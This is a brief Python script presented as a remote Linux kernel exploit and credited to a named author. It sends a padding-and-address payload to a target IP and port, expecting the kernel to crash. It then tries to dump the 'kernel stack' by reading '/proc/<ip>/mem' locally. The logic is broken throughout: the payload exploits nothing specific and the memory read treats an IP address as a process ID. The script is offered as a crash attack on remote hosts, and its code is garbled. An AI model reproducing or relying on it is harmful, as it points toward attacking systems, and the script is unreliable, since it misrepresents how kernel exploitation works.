# Linux kernel exploit

# Author: @_hugsy_
#
# This exploit is based on the following paper:
# https://www.exploit-db.com/papers/1389/
#

# Imports
import sys
import struct
import socket
import time
import argparse

# Constants
KERNEL_ADDR = 0xffffffff81000000
KERNEL_STACK = 0xffffffff81010000
KERNEL_STACK_SIZE = 0x1000

# Functions
def get_args():
    parser = argparse.ArgumentParser(description='Linux kernel exploit')
    parser.add_argument('-i', '--ip', type=str, help='IP address of the target')
    parser.add_argument('-p', '--port', type=int, help='Port of the target')
    args = parser.parse_args()
    return args

# Main
def main():
    args = get_args()
    if not args.ip or not args.port:
        print('[-] Error: missing arguments')
        sys.exit(1)

    # Create socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.ip, args.port))

    # Send payload
    payload = b'A' * 0x10
    payload += struct.pack('<Q', KERNEL_ADDR)
    payload += struct.pack('<Q', KERNEL_STACK)
    payload += struct.pack('<Q', KERNEL_STACK_SIZE)
    sock.send(payload)

    # Wait for the kernel to crash
    time.sleep(1)
    sock.close()

    # Print the kernel's stack
    print('[+] Kernel stack:')
    print('[+] ' + ''.join('{:02x}'.format(x) for x in struct.unpack('<' + 'B' * KERNEL_STACK_SIZE, open('/proc/{}/mem'.format(args.ip), 'rb').read(KERNEL_STACK_SIZE))))
    
if __name__ == '__main__':
    main()